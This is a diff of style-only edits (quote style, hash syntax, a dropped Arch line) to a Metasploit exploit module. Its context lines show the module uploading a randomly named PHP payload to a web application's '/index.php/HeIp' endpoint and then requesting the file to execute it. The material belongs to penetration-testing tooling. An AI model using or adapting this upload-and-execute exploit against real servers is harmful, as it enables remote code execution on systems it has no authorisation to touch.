@@ -31,10 +31,9 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'URL', 'https://seclists.org/fulldisclosure/2014/Aug/77' ] # The day the vuln went public
         ],
         'Payload' => {
-          'BadChars' => "\x00",
+          'BadChars' => "\x00"
         },
         'Platform' => 'php',
-        'Arch'	=> ARCH_PHP,
         'Targets' => [
           [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
@@ -60,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
     uri = target_uri.path
 
     payload_name = "#{rand_text_alpha(8)}.php"
-    php_payload = get_write_exec_payload(:unlink_self => true)
+    php_payload = get_write_exec_payload(unlink_self: true)
 
     res = send_request_cgi({
       'uri' => normalize_uri(uri + '/index.php/HeIp'),
@@ -74,11 +73,11 @@ class MetasploitModule < Msf::Exploit::Remote
       }
     })
 
-    if not res or res.code != 200
+    if !res or res.code != 200
       fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed")
     end
 
-    upload_uri = normalize_uri(uri + "/" + payload_name)
+    upload_uri = normalize_uri(uri + '/' + payload_name)
     print_status("Executing payload #{payload_name}")
     send_request_raw({
       'uri' => upload_uri,
